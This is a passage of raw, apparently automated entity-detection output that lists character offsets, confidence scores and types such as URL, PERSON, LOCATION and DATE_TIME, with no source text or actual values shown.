23186, score: 0.5, type: URL, start: 23222, end: 23234, score: 0.5, type: URL, start: 24116, end: 24126, score: 0.5, type: URL, start: 24129, end: 24136, score: 0.5, type: URL, start: 24180, end: 24187, score: 0.5, type: URL, start: 24465, end: 24472, score: 0.5, type: URL, start: 24932, end: 24944, score: 0.5, type: URL, start: 25325, end: 25332, score: 0.5, type: URL, start: 25360, end: 25372, score: 0.5, type: URL, start: 25618, end: 25641, score: 0.5, type: URL, start: 26555, end: 26565, score: 0.5, type: URL, start: 26568, end: 26575, score: 0.5, type: URL, start: 26619, end: 26626, score: 0.5, type: URL, start: 26948, end: 26955, score: 0.5, type: URL, start: 26981, end: 26992, score: 0.5, type: URL, start: 27099, end: 27112, score: 0.5, type: URL, start: 27300, end: 27307, score: 0.5, type: URL, start: 27731, end: 27741, score: 0.5, type: URL, start: 27897, end: 27908, score: 0.5, type: URL, start: 28545, end: 28556, score: 0.5, type: URL, start: 29218, end: 29227, score: 0.5, type: URL, start: 29405, end: 29424, score: 0.5, type: URL, start: 29438, end: 29448, score: 0.5, type: URL, start: 29781, end: 29787, score: 0.5, type: URL, start: 30067, end: 30077, score: 0.5, type: URL, start: 30087, end: 30097, score: 0.5, type: URL, start: 30150, end: 30161, score: 0.5, type: URL, start: 30217, end: 30227, score: 0.5, type: URL, start: 30514, end: 30525, score: 0.5, type: URL, start: 30622, end: 30629, score: 0.5, type: URL, start: 30675, end: 30687, score: 0.5, type: URL, start: 31424, end: 31436, score: 0.5, type: URL, start: 31565, end: 31569, score: 0.5, type: URL, start: 31604, end: 31614, score: 0.5, type: URL, start: 31617, end: 31623, score: 0.5, type: URL, start: 31754, end: 31760, score: 0.5, type: URL, start: 31762, end: 31766, score: 0.5, type: URL, start: 31898, end: 31904, score: 0.5, type: URL, start: 31923, end: 31929, score: 0.5, type: URL, start: 32026, end: 32032, score: 0.5, type: URL, start: 32186, end: 32192, score: 0.5, type: URL, start: 32397, end: 32409, score: 0.5, type: URL, start: 32514, end: 32520, score: 0.5, type: URL, start: 32551, end: 32557, score: 0.5, type: URL, start: 32645, end: 32651, score: 0.5, type: URL, start: 32837, end: 32844, score: 0.5, type: URL, start: 33352, end: 33363, score: 0.5, type: URL, start: 33610, end: 33617, score: 0.5, type: URL, start: 33813, end: 33819, score: 0.5, type: URL, start: 33851, end: 33858, score: 0.5, type: URL, start: 34643, end: 34650, score: 0.5, type: URL, start: 35004, end: 35011, score: 0.5, type: URL, start: 35134, end: 35141, score: 0.5, type: URL, start: 35499, end: 35506, score: 0.5, type: URL, start: 35701, end: 35713, score: 0.5, type: URL, start: 35784, end: 35795, score: 0.5, type: URL, start: 35867, end: 35874, score: 0.5, type: URL, start: 36151, end: 36158, score: 0.5, type: URL, start: 37111, end: 37118, score: 0.5, type: URL, start: 37218, end: 37225, score: 0.5, type: URL, start: 37700, end: 37707, score: 0.5, type: URL, start: 37906, end: 37912, score: 0.5, type: URL, start: 37937, end: 37943, score: 0.5, type: URL, start: 37990, end: 37996, score: 0.5, type: URL, start: 38071, end: 38077, score: 0.5, type: URL, start: 38375, end: 38381, score: 0.5, type: URL, start: 38471, end: 38479, score: 0.5, type: URL, start: 38614, end: 38622, score: 0.5, type: URL, start: 40634, end: 40639, score: 0.5, type: URL, start: 41175, end: 41181, score: 0.5, type: URL, start: 41891, end: 41902, score: 0.5, type: URL, start: 42230, end: 42241, score: 0.5, type: DATE_TIME, start: 39, end: 43, score: 0.85, type: 
DATE_TIME, start: 368, end: 378, score: 0.85, type: LOCATION, start: 386, end: 402, score: 0.85, type: PERSON, start: 1032, end: 1039, score: 0.85, type: PERSON, start: 1041, end: 1051, score: 0.85, type: LOCATION, start: 1053, end: 1060, score: 0.85, type: DATE_TIME, start: 1327, end: 1343, score: 0.85, type: URL, start: 2434, end: 2444, score: 0.85, type: URL, start: 2453, end: 2469, score: 0.85, type: PERSON, start: 2831, end: 2841, score: 0.85, type: URL, start: 3599, end: 3606, score: 0.85, type: URL, start: 3626, end: 3633, score: 0.85, type: URL, start: 3922, end: 3933, score: 0.85, type: LOCATION, start: 4158, end: 4174, score: 0.85, type: LOCATION, start: 5158, end: 5169, score: 0.85, type: LOCATION, start: 6349, end: 6357, score: 0.85, type: PERSON, start: 6588, end: 6603, score: 0.85, type: LOCATION, start: 6717, end: 6742, score: 0.85, type: PERSON, start: 8883, end: 8895, score: 0.85, type: URL, start: 157, end: 208, score: 0.6, type: IP_ADDRESS, start: 6698, end: 6707, score: 0.6, type: URL, start: 283, end: 290, score: 0.5, type: URL, start: 1121, end: 1128, score: 0.5, type: URL, start: 1159, end: 1169, score: 0.5, type: URL, start: 1447, end: 1454, score: 0.5, type: URL, start: 1461, end: 1466, score: 0.5, type: URL, start: 1518, end: 1525, score: 0.5, type: URL, start: 1547, end: 1554, score: 0.5, type: URL, start: 1576, end: 1583, score: 0.5, type: URL, start: 1828, end: 1835, score: 0.5, type: URL, start: 1841, end: 1848, score: 0.5, type: URL, start: 2078, end: 2085, score: 0.5, type: URL, start: 2101, end: 2106, score: 0.5, type: URL, start: 2231, end: 2238, score: 0.5, type: URL, start: 2283, end: 2290, score: 0.5, type: URL, start: 2312, end: 2320, score: 0.5, type: URL, start: 2940, end: 2947, score: 0.5, type: URL, start: 2960, end: 2968, score: 0.5, type: URL, start: 2992, end: 2999, score: 0.5, type: URL, start: 3039, end: 3046, score: 0.5, type: URL, start: 3067, end: 3078, score: 0.5, type: URL, start: 3412, end: 3420, score: 0.5, type: URL, start: 3495, end: 3510, score: 0.5, type: URL, start: 3676, end: 3683, score: 0.5, type: URL, start: 3711, end: 3722, score: 0.5, type: URL, start: 4040, end: 4044, score: 0.5, type: URL, start: 4051, end: 4059, score: 0.5, type: URL, start: 4357, end: 4361, score: 0.5, type: URL, start: 4384, end: 4388, score: 0.5, type: URL, start: 4670, end: 4677, score: 0.5, type: URL, start: 5024, end: 5031, score: 0.5, type: URL, start: 5065, end: 5076, score: 0.5, type: URL, start: 5122, end: 5129, score: 0.5, type: URL, start: 5158, end: 5172, score: 0.5, type: URL, start: 5471, end: 5479, score: 0.5, type: URL, start: 5504, end: 5511, score: 0.5, type: URL, start: 5564, end: 5572, score: 0.5, type: URL, start: 5762, end: 5769, score: 0.5, type: URL, start: 5791, end: 5799, score: 0.5, type: URL, start: 5878, end: 5889, score: 0.5, type: URL, start: 6019, end: 6026, score: 0.5, type: URL, start: 6617, end: 6624, score: 0.5, type: URL, start: 6819, end: 6826, score: 0.5, type: URL, start: 7389, end: 7393, score: 0.5, type: URL, start: 7431, end: 7435, score: 0.5, type: URL, start: 7616, end: 7623, score: 0.5, type: URL, start: 7639, end: 7646, score: 0.5, type: URL, start: 7699, end: 7706, score: 0.5, type: URL, start: 7838, end: 7845, score: 0.5, type: URL, start: 7885, end: 7892, score: 0.5, type: URL, start: 8021, end: 8028, score: 0.5, type: URL, start: 8341, end: 8350, score: 0.5, type: URL, start: 8504, end: 8511, score: 0.5, type: URL, start: 8547, end: 8554, score: 0.5, type: URL, start: 8837, end: 8848, score: 0.5, type: 
URL, start: 8863, end: 8870, score: 0.5, type: URL, start: 9007, end: 9020, score: 0.5, type: URL, start: 9049, end: 9056, score: 0.5, type: URL, start: 9131, end: 9141, score: 0.5, type: EMAIL_ADDRESS, start: 94, end: 109, score: 1.0, type: PERSON, start: 81, end: 93, score: 0.85, type: LOCATION, start: 2462, end: 2472, score: 0.85, type: PERSON, start: 2692, end: 2696, score: 0.85, type: PERSON, start: 2751, end: 2762, score: 0.85, type: PERSON, start: 3137, end: 3140, score: 0.85, type: PERSON, start: 3620, end: 3624, score: 0.85, type: PERSON, start: 4440, end: 4443, score: 0.85, type: LOCATION, start: 4447, end: 4451, score: 0.85, type: PERSON, start: 4500, end: 4503, score: 0.85, type: LOCATION, start: 4534, end: 4538, score: 0.85, type: PERSON, start: 5609, end: 5612, score: 0.85, type: URL, start: 6099, end: 6110, score: 0.85, type: LOCATION, start: 7490, end: 7501, score: 0.85, type: URL, start: 7490, end: 7496, score: 0.85, type: URL, start: 7669, end: 7680, score: 0.85, type: LOCATION, start: 7934, end: 7945, score: 0.85, type: URL, start: 7934, end: 7940, score: 0.85, type: URL, start: 100, end: 109, score: 0.5, type: URL, start: 325, end: 339, score: 0.5, type: URL, start: 441, end: 447, score: 0.5, type: URL, start: 738, end: 745, score: 0.5, type: URL, start: 951, end: 967, score: 0.5, type: URL, start: 1288, end: 1297, score: 0.5, type: URL, start: 1340, end: 1344, score: 0.5, type: URL, start: 2158, end: 2166, score: 0.5, type: URL, start: 2200, end: 2207, score: 0.5, type: URL, start: 2283, end: 2293, score: 0.5, type: URL, start: 2336, end: 2346, score: 0.5, type: URL, start: 2390, end: 2395, score: 0.5, type: URL, start: 2462, end: 2469, score: 0.5, type: URL, start: 2509, end: 2519, score: 0.5, type: URL, start: 2583, end: 2589, score: 0.5, type: URL, start: 2606, end: 2612, score: 0.5, type: URL, start: 3685, end: 3696, score: 0.5, type: URL, start: 3762, end: 3773, score: 0.5, type: URL, start: 3892, end: 3902, score: 0.5, type: URL, start: 3973, end: 3979, score: 0.5, type: URL, start: 4646, end: 4657, score: 0.5, type: URL, start: 5065, end: 5075, score: 0.5, type: URL, start: 5233, end: 5244, score: 0.5, type: URL, start: 5451, end: 5462, score: 0.5, type: URL, start: 5691, end: 5702, score: 0.5, type: URL, start: 5882, end: 5893, score: 0.5, type: URL, start: 5961, end: 5972, score: 0.5, type: URL, start: 6237, end: 6248, score: 0.5, type: URL, start: 7556, end: 7562, score: 0.5, type: URL, start: 7778, end: 7808, score: 0.5, type: EMAIL_ADDRESS, start: 75, end: 90, score: 1.0, type: DATE_TIME, start: 16, end: 20, score: 0.85, type: PERSON, start: 21, end: 28, score: 0.85, type: PERSON, start: 35, end: 44, score: 0.85, type: PERSON, start: 1411, end: 1425, score: 0.85, type: URL, start: 697, end: 725, score: 0.6, type: URL, start: 81, end: 90, score: 0.5, type: URL, start: 734, end: 748, score: 0.5, type: URL, start: 1215, end: 1222, score: 0.5, type: URL, start: 1333, end: 1340, score: 0.5, type: URL, start: 1598, end: 1605, score: 0.5, type: URL, start: 1644, end: 1651, score: 0.5, type: URL, start: 1910, end: 1917, score: 0.5, type: URL, start: 1999, end: 2006, score: 0.5, type: URL, start: 2052, end: 2059, score: 0.5, type: URL, start: 2279, end: 2286, score: 0.5, type: URL, start: 2406, end: 2413, score: 0.5, type: EMAIL_ADDRESS, start: 39, end: 54, score: 1.0, type: EMAIL_ADDRESS, start: 80, end: 95, score: 1.0, type: URL, start: 103, end: 138, score: 0.95, type: PERSON, start: 25, end: 38, score: 0.85, type: PERSON, start: 65, end: 79, score: 0.85, type: 
LOCATION, start: 103, end: 138, score: 0.85, type: PERSON, start: 801, end: 805, score: 0.85, type: LOCATION, start: 1537, end: 1550, score: 0.85, type: LOCATION, start: 1593, end: 1606, score: 0.85, type: LOCATION, start: 1635, end: 1648, score: 0.85, type: LOCATION, start: 2024, end: 2034, score: 0.85, type: PERSON, start: 2615, end: 2625, score: 0.85, type: PERSON, start: 2793, end: 2807, score: 0.85, type: PERSON, start: 2887, end: 2899, score: 0.85, type: PERSON, start: 2946, end: 2958, score: 0.85, type: PERSON, start: 3185, end: 3199, score: 0.85, type: PERSON, start: 3247, end: 3259, score: 0.85, type: PERSON, start: 3274, end: 3286, score: 0.85, type: LOCATION, start: 3875, end: 3891, score: 0.85, type: PERSON, start: 5049, end: 5057, score: 0.85, type: PERSON, start: 5226, end: 5234, score: 0.85, type: PERSON, start: 7274, end: 7295, score: 0.85, type: PERSON, start: 8985, end: 8993, score: 0.85, type: PERSON, start: 9227, end: 9264, score: 0.85, type: PERSON, start: 9368, end: 9380, score: 0.85, type: PERSON, start: 9405, end: 9413, score: 0.85, type: NRP, start: 9870, end: 9876, score: 0.85, type: PERSON, start: 10429, end: 10437, score: 0.85, type: PERSON, start: 10517, end: 10525, score: 0.85, type: LOCATION, start: 18147, end: 18169, score: 0.85, type: LOCATION, start: 18234, end: 18256, score: 0.85, type: LOCATION, start: 18982, end: 18989, score: 0.85, type: PERSON, start: 20843, end: 20851, score: 0.85, type: PERSON, start: 20884, end: 20891, score: 0.85, type: PERSON, start: 21155, end: 21163, score: 0.85, type: PERSON, start: 22401, end: 22417, score: 0.85, type: LOCATION, start: 22717, end: 22739, score: 0.85, type: NRP, start: 22932, end: 22944, score: 0.85, type: LOCATION, start: 23706, end: 23728, score: 0.85, type: LOCATION, start: 23826, end: 23848, score: 0.85, type: LOCATION, start: 24017, end: 24039, score: 0.85, type: DATE_TIME, start: 25432, end: 25439, score: 0.85, type: PERSON, start: 25442, end: 25465, score: 0.85, type: DATE_TIME, start: 25743, end: 25749, score: 0.85, type: DATE_TIME, start: 25766, end: 25772, score: 0.85, type: LOCATION, start: 26212, end: 26234, score: 0.85, type: LOCATION, start: 26303, end: 26325, score: 0.85, type: DATE_TIME, start: 26336, end: 26342, score: 0.85, type: LOCATION, start: 26391, end: 26413, score: 0.85, type: LOCATION, start: 26506, end: 26528, score: 0.85, type: PERSON, start: 26846, end: 26869, score: 0.85, type: DATE_TIME, start: 28004, end: 28008, score: 0.85, type: LOCATION, start: 28189, end: 28202, score: 0.85, type: DATE_TIME, start: 28850, end: 28856, score: 0.85, type: DATE_TIME, start: 28873, end: 28879, score: 0.85, type: LOCATION, start: 29160, end: 29182, score: 0.85, type: LOCATION, start: 29251, end: 29273, score: 0.85, type: DATE_TIME, start: 29284, end: 29290, score: 0.85, type: LOCATION, start: 29339, end: 29361, score: 0.85, type: PERSON, start: 29673, end: 29696, score: 0.85, type: LOCATION, start: 29862, end: 29879, score: 0.85, type: PERSON, start: 29907, end: 29930, score: 0.85, type: PERSON, start: 30532, end: 30536, score: 0.85, type: PERSON, start: 30747, end: 30770, score: 0.85, type: PERSON, start: 30772, end: 30783, score: 0.85, type: DATE_TIME, start: 31048, end: 31054, score: 0.85, type: DATE_TIME, start: 31071, end: 31077, score: 0.85, type: DATE_TIME, start: 31149, end: 31155, score: 0.85, type: LOCATION, start: 31533, end: 31555, score: 0.85, type: LOCATION, start: 31624, end: 31646, score: 0.85, type: DATE_TIME, start: 31657, end: 31663, score: 0.85, type: LOCATION, start: 31717, 
end: 31739, score: 0.85, type: LOCATION, start: 31913, end: 31935, score: 0.85, type: PERSON, start: 31988, end: 31998, score: 0.85, type: LOCATION, start: 32007, end: 32029, score: 0.85, type: PERSON, start: 32372, end: 32395, score: 0.85, type: PERSON, start: 33072, end: 33095, score: 0.85, type: DATE_TIME, start: 33216, end: 33222, score: 0.85, type: DATE_TIME, start: 33354, end: 33362, score: 0.85, type: PERSON, start: 33364, end: 33373, score: 0.85, type: DATE_TIME, start: 34289, end: 34295, score: 0.85, type: DATE_TIME, start: 35650, end: 35656, score: 0.85, type: DATE_TIME, start: 36006, end: 36012, score: 0.85, type: PERSON, start: 36146, end: 36169, score: 0.85, type: DATE_TIME, start: 36592, end: 36598, score: 0.85, type: DATE_TIME, start: 36615, end: 36621, score: 0.85, type: LOCATION, start: 36902, end: 36924, score: 0.85, type: LOCATION, start: 36993, end: 37015, score: 0.85, type: DATE_TIME, start: 37026, end: 37032, score: 0.85, type: LOCATION, start: 37081, end: 37103, score: 0.85, type: PERSON, start: 37425, end: 37448, score: 0.85, type: LOCATION, start: 37614, end: 37631, score: 0.85, type: PERSON, start: 37659, end: 37682, score: 0.85, type: PERSON, start: 37921, end: 37944, score: 0.85, type: PERSON, start: 37946, end: 37957, score: 0.85, type: PERSON, start: 38455, end: 38478, score: 0.85, type: PERSON, start: 38480, end: 38491, score: 0.85, type: LOCATION, start: 38995, end: 39017, score: 0.85, type: PERSON, start: 39864, end: 39887, score: 0.85, type: LOCATION, start: 40701, end: 40723, score: 0.85, type: LOCATION, start: 40791, end: 40813, score: 0.85, type: DATE_TIME, start: 42473, end: 42491, score: 0.85, type: DATE_TIME, start: 42700, end: 42718, score: 0.85, type: DATE_TIME, start: 42819, end: 42838, score: 0.85, type: LOCATION, start: 43153, end: 43175, score: 0.85, type: DATE_TIME, start: 44358, end: 44364, score: 0.85, type: LOCATION, start: 44567, end: 44577, score: 0.85, type: LOCATION, start: 44582, end: 44592, score: 0.85, type: LOCATION, start: 45456, end: 45478, score: 0.85, type: PERSON, start: 47608, end: 47612, score: 0.85, type: LOCATION, start: 47828, end: 47850, score: 0.85, type: LOCATION, start: 47930, end: 47952, score: 0.85, type: LOCATION, start: 48038, end: 48060, score: 0.85, type: LOCATION, start: 48147, end: 48169, score: 0.85, type: PERSON, start: 48296, end: 48304, score: 0.85, type: URL, start: 48324, end: 48331, score: 0.85, type: LOCATION, start: 48349, end: 48371, score: 0.85, type: URL, start: 48349, end: 48356, score: 0.85, type: LOCATION, start: 48450, end: 48472, score: 0.85, type: LOCATION, start: 48544, end: 48566, score: 0.85, type: PERSON, start: 48875, end: 48898, score: 0.85, type: PERSON, start: 48900, end: 48908, score: 0.85, type: PERSON, start: 49753, end: 49757, score: 0.85, type: LOCATION, start: 50472, end: 50494, score: 0.85, type: LOCATION, start: 50590, end: 50612, score: 0.85, type: PERSON, start: 51043, end: 51066, score: 0.85, type: URL, start: 52019, end: 52025, score: 0.85, type: PERSON, start: 53004, end: 53048, score: 0.85, type: PERSON, start: 53863, end: 53941, score: 0.85, type: LOCATION, start: 54720, end: 54742, score: 0.85, type: PERSON, start: 55026, end: 55049, score: 0.85, type: PERSON, start: 55661, end: 55674, score: 0.85, type: PERSON, start: 55678, end: 55701, score: 0.85, type: PERSON, start: 55719, end: 55732, score: 0.85, type: PERSON, start: 56901, end: 56926, score: 0.85, type: LOCATION, start: 58329, end: 58351, score: 0.85, type: PERSON, start: 58872, end: 58888, score: 0.85, type: 
PERSON, start: 58955, end: 58968, score: 0.85, type: PERSON, start: 59757, end: 59780, score: 0.85, type: LOCATION, start: 59861, end: 59874, score: 0.85, type: LOCATION, start: 60565, end: 60587, score: 0.85, type: LOCATION, start: 60658, end: 60680, score: 0.85, type: LOCATION, start: 60855, end: 60877, score: 0.85, type: PERSON, start: 63742, end: 63765, score: 0.85, type: PERSON, start: 64260, end: 64283, score: 0.85, type: LOCATION, start: 64906, end: 64928, score: 0.85, type: PERSON, start: 65720, end: 65743, score: 0.85, type: LOCATION, start: 66460, end: 66482, score: 0.85, type: PERSON, start: 66621, end: 66628, score: 0.85, type: LOCATION, start: 66763, end: 66785, score: 0.85, type: PERSON, start: 66916, end: 66923, score: 0.85, type: LOCATION, start: 67058, end: 67080, score: 0.85, type: LOCATION, start: 67174, end: 67196, score: 0.85, type: LOCATION, start: 67278, end: 67300, score: 0.85, type: PERSON, start: 67849, end: 67856, score: 0.85, type: DATE_TIME, start: 69049, end: 69050, score: 0.85, type: DATE_TIME, start: 69052, end: 69053, score: 0.85, type: PERSON, start: 69353, end: 69408, score: 0.85, type: PERSON, start: 69828, end: 69851, score: 0.85, type: PERSON, start: 70534, end: 70557, score: 0.85, type: LOCATION, start: 70559, end: 70572, score: 0.85, type: PERSON, start: 70620, end: 70643, score: 0.85, type: LOCATION, start: 70645, end: 70658, score: 0.85, type: LOCATION, start: 71086, end: 71108, score: 0.85, type: PERSON, start: 71438, end: 71461, score: 0.85, type: PERSON, start: 71625, end: 71638, score: 0.85, type: LOCATION, start: 71762, end: 71776, score: 0.85, type: LOCATION, start: 71830, end: 71844, score: 0.85, type: LOCATION, start: 71892, end: 71915, score: 0.85, type: LOCATION, start: 75214, end: 75236, score: 0.85, type: LOCATION, start: 75309, end: 75331, score: 0.85, type: LOCATION, start: 75427, end: 75449, score: 0.85, type: PERSON, start: 75588, end: 75595, score: 0.85, type: LOCATION, start: 75730, end: 75752, score: 0.85, type: PERSON, start: 75883, end: 75890, score: 0.85, type: LOCATION, start: 76022, end: 76044, score: 0.85, type: LOCATION, start: 76219, end: 76241, score: 0.85, type: PERSON, start: 76772, end: 76795, score: 0.85, type: PERSON, start: 77436, end: 77459, score: 0.85, type: LOCATION, start: 77579, end: 77581, score: 0.85, type: PERSON, start: 77914, end: 77921, score: 0.85, type: LOCATION, start: 80621, end: 80643, score: 0.85, type: LOCATION, start: 80738, end: 80760, score: 0.85, type: LOCATION, start: 80838, end: 80860, score: 0.85, type: PERSON, start: 80999, end: 81006, score: 0.85, type: LOCATION, start: 81141, end: 81163, score: 0.85, type: PERSON, start: 81294, end: 81301, score: 0.85, type: LOCATION, start: 81433, end: 81455, score: 0.85, type: LOCATION, start: 81627, end: 81649, score: 0.85, type: LOCATION, start: 81798, end: 81820, score: 0.85, type: LOCATION, start: 81995, end: 82017, score: 0.85, type: LOCATION, start: 82166, end: 82188, score: 0.85, type: LOCATION, start: 82329, end: 82351, score: 0.85, type: LOCATION, start: 82500, end: 82522, score: 0.85, type: LOCATION, start: 82699, end: 82721, score: 0.85, type: PERSON, start: 83530, end: 83553, score: 0.85, type: PERSON, start: 83685, end: 83708, score: 0.85, type: PERSON, start: 84031, end: 84038, score: 0.85, type: PERSON, start: 85396, end: 85419, score: 0.85, type: PERSON, start: 86130, end: 86153, score: 0.85, type: PERSON, start: 86848, end: 86871, score: 0.85, type: PERSON, start: 87692, end: 87715, score: 0.85, type: LOCATION, start: 88873, end: 
88895, score: 0.85, type: PERSON, start: 89277, end: 89300, score: 0.85, type: PERSON, start: 89335, end: 89339, score: 0.85, type: LOCATION, start: 89585, end: 89625, score: 0.85, type: LOCATION, start: 90404, end: 90426, score: 0.85, type: LOCATION, start: 90524, end: 90546, score: 0.85, type: PERSON, start: 90842, end: 90865, score: 0.85, type: PERSON, start: 90920, end: 90927, score: 0.85, type: LOCATION, start: 91381, end: 91403, score: 0.85, type: PERSON, start: 91729, end: 91752, score: 0.85, type: LOCATION, start: 92344, end: 92366, score: 0.85, type: LOCATION, start: 93075, end: 93097, score: 0.85, type: LOCATION, start: 93820, end: 93842, score: 0.85, type: PERSON, start: 94148, end: 94178, score: 0.85, type: LOCATION, start: 94591, end: 94613, score: 0.85, type: LOCATION, start: 94889, end: 94914, score: 0.85, type: LOCATION, start: 95396, end: 95418, score: 0.85, type: LOCATION, start: 95510, end: 95532, score: 0.85, type: PERSON, start: 95814, end: 95837, score: 0.85, type: PERSON, start: 95892, end: 95899, score: 0.85, type: LOCATION, start: 96363, end: 96385, score: 0.85, type: PERSON, start: 96679, end: 96702, score: 0.85, type: PERSON, start: 96757, end: 96764, score: 0.85, type: DATE_TIME, start: 96890, end: 96897, score: 0.85, type: LOCATION, start: 97299, end: 97321, score: 0.85, type: LOCATION, start: 97412, end: 97434, score: 0.85, type: DATE_TIME, start: 97618, end: 97625, score: 0.85, type: PERSON, start: 97755, end: 97778, score: 0.85, type: DATE_TIME, start: 98179, end: 98185, score: 0.85, type: NRP, start: 98258, end: 98269, score: 0.85, type: DATE_TIME, start: 98785, end: 98791, score: 0.85, type: DATE_TIME, start: 98808, end: 98814, score: 0.85, type: LOCATION, start: 98930, end: 98952, score: 0.85, type: LOCATION, start: 99045, end: 99067, score: 0.85, type: DATE_TIME, start: 99078, end: 99084, score: 0.85, type: PERSON, start: 99394, end: 99417, score: 0.85, type: DATE_TIME, start: 99634, end: 99640, score: 0.85, type: DATE_TIME, start: 100074, end: 100078, score: 0.85, type: PERSON, start: 100551, end: 100566, score: 0.85, type: DATE_TIME, start: 100641, end: 100648, score: 0.85, type: PERSON, start: 101066, end: 101089, score: 0.85, type: PERSON, start: 101242, end: 101258, score: 0.85, type: DATE_TIME, start: 101531, end: 101535, score: 0.85, type: DATE_TIME, start: 101932, end: 101939, score: 0.85, type: LOCATION, start: 102688, end: 102710, score: 0.85, type: LOCATION, start: 102963, end: 102985, score: 0.85, type: LOCATION, start: 103089, end: 103111, score: 0.85, type: PERSON, start: 103250, end: 103257, score: 0.85, type: LOCATION, start: 103392, end: 103414, score: 0.85, type: PERSON, start: 103545, end: 103552, score: 0.85, type: PERSON, start: 104018, end: 104041, score: 0.85, type: PERSON, start: 104331, end: 104338, score: 0.85, type: LOCATION, start: 105711, end: 105733, score: 0.85, type: PERSON, start: 106065, end: 106088, score: 0.85, type: DATE_TIME, start: 107212, end: 107218, score: 0.85, type: LOCATION, start: 110582, end: 110604, score: 0.85, type: PERSON, start: 110922, end: 110945, score: 0.85, type: LOCATION, start: 110995, end: 111050, score: 0.85, type: PERSON, start: 111332, end: 111355, score: 0.85, type: LOCATION, start: 111807, end: 111829, score: 0.85, type: LOCATION, start: 111914, end: 111936, score: 0.85, type: DATE_TIME, start: 113120, end: 113124, score: 0.85, type: PERSON, start: 115540, end: 115566, score: 0.85, type: URL, start: 767, end: 795, score: 0.6, type: IP_ADDRESS, start: 87585, end: 87586, score: 0.6, type: 
IP_ADDRESS, start: 111252, end: 111254, score: 0.6, type: URL, start: 45, end: 54, score: 0.5, type: URL, start: 86, end: 95, score: 0.5, type: URL, start: 1026, end: 1045, score: 0.5, type: URL, start: 1331, end: 1348, score: 0.5, type: URL, start: 1380, end: 1397, score: 0.5, type: URL, start: 1439, end: 1456, score: 0.5, type: URL, start: 1488, end: 1505, score: 0.5, type: URL, start: 1537, end: 1554, score: 0.5, type: URL, start: 1593, end: 1604, score: 0.5, type: URL, start: 1635, end: 1651, score: 0.5, type: URL, start: 1671, end: 1689, score: 0.5, type: URL, start: 1715, end: 1733, score: 0.5, type: URL, start: 1761, end: 1773, score: 0.5, type: URL, start: 2040, end: 2053, score: 0.5, type: URL, start: 2080, end: 2093, score: 0.5, type: URL, start: 2116, end: 2129, score: 0.5, type: URL, start: 2153, end: 2166, score: 0.5, type: URL, start: 2191, end: 2204, score: 0.5, type: URL, start: 2228, end: 2241, score: 0.5, type: URL, start: 2265, end: 2278, score: 0.5, type: URL, start: 2303, end: 2316, score: 0.5, type: URL, start: 2348, end: 2361, score: 0.5, type: URL, start: 2385, end: 2398, score: 0.5, type: URL, start: 2422, end: 2435, score: 0.5, type: URL, start: 2458, end: 2471, score: 0.5, type: URL, start: 2496, end: 2509, score: 0.5, type: URL, start: 2979, end: 2985, score: 0.5, type: URL, start: 3082, end: 3088, score: 0.5, type: URL, start: 3689, end: 3696, score: 0.5, type: URL, start: 3826, end: 3841, score: 0.5, type: URL, start: 3875, end: 3884, score: 0.5, type: URL, start: 4210, end: 4225, score: 0.5, type: URL, start: 4308, end: 4317, score: 0.5, type: URL, start: 4423, end: 4430, score: 0.5, type: URL, start: 4883, end: 4892, score: 0.5, type: URL, start: 5413, end: 5420, score: 0.5, type: URL, start: 5540, end: 5547, score: 0.5, type: URL, start: 5691, end: 5698, score: 0.5, type: URL, start: 5865, end: 5872, score: 0.5, type: URL, start: 5910, end: 5917, score: 0.5, type: URL, start: 6177, end: 6189, score: 0.5, type: URL, start: 6201, end: 6210, score: 0.5, type: URL, start: 6732, end: 6741, score: 0.5, type: URL, start: 6810, end: 6819, score: 0.5, type: URL, start: 7166, end: 7173, score: 0.5, type: URL, start: 7383, end: 7392, score: 0.5, type: URL, start: 7430, end: 7437, score: 0.5, type: URL, start: 7448, end: 7455, score: 0.5, type: URL, start: 7466, end: 7473, score: 0.5, type: URL, start: 7489, end: 7496, score: 0.5, type: URL, start: 7704, end: 7713, score: 0.5, type: URL, start: 9907, end: 9914, score: 0.5, type: URL, start: 10052, end: 10059, score: 0.5, type: URL, start: 10072, end: 10079, score: 0.5, type: URL, start: 10090, end: 10097, score: 0.5, type: URL, start: 10106, end: 10112, score: 0.5, type: URL, start: 10127, end: 10134, score: 0.5, type: URL, start: 10143, end: 10147, score: 0.5, type: URL, start: 10196, end: 10203, score: 0.5, type: URL, start: 10613, end: 10621, score: 0.5, type: URL, start: 11171, end: 11178, score: 0.5, type: URL, start: 11182, end: 11189, score: 0.5, type: URL, start: 11307, end: 11314, score: 0.5, type: URL, start: 11318, end: 11325, score: 0.5, type: URL, start: 13709, end: 13716, score: 0.5, type: URL, start: 13732, end: 13738, score: 0.5, type: URL, start: 13984, end: 13993, score: 0.5, type: URL, start: 14023, end: 14032, score: 0.5, type: URL, start: 16662, end: 16671, score: 0.5, type: URL, start: 18079, end: 18086, score: 0.5, type: URL, start: 18108, end: 18115, score: 0.5, type: URL, start: 18147, end: 18154, score: 0.5, type: URL, start: 18234, end: 18241, score: 0.5, type: URL, start: 18306, end: 18313, 
score: 0.5, type: URL, start: 18447, end: 18454, score: 0.5, type: URL, start: 18530, end: 18537, score: 0.5, type: URL, start: 18611, end: 18618, score: 0.5, type: URL, start: 18678, end: 18685, score: 0.5, type: URL, start: 19742, end: 19758, score: 0.5, type: URL, start: 19816, end: 19823, score: 0.5, type: URL, start: 19925, end: 19941, score: 0.5, type: URL, start: 19999, end: 20006, score: 0.5, type: URL, start: 20087, end: 20107, score: 0.5, type: URL, start: 20159, end: 20166, score: 0.5, type: URL, start: 20680, end: 20690, score: 0.5, type: URL, start: 20714, end: 20724, score: 0.5, type: URL, start: 21105, end: 21117, score: 0.5, type: URL, start: 21185, end: 21197, score: 0.5, type: URL, start: 21240, end: 21252, score: 0.5, type: URL, start: 21312, end: 21324, score: 0.5, type: URL, start: 21777, end: 21782, score: 0.5, type: URL, start: 22696, end: 22703, score: 0.5, type: URL, start: 22717, end: 22724, score: 0.5, type: URL, start: 22794, end: 22803, score: 0.5, type: URL, start: 22932, end: 22939, score: 0.5, type: URL, start: 23018, end: 23027, score: 0.5, type: URL, start: 23029, end: 23036, score: 0.5, type: URL, start: 23688, end: 23695, score: 0.5, type: URL, start: 23706, end: 23713, score: 0.5, type: URL, start: 23771, end: 23794, score: 0.5, type: URL, start: 23826, end: 23833, score: 0.5, type: URL, start: 23875, end: 23892, score: 0.5, type: URL, start: 23962, end: 23979, score: 0.5, type: URL, start: 23997, end: 24004, score: 0.5, type: URL, start: 24017, end: 24024, score: 0.5, type: URL, start: 24064, end: 24077, score: 0.5, type: URL, start: 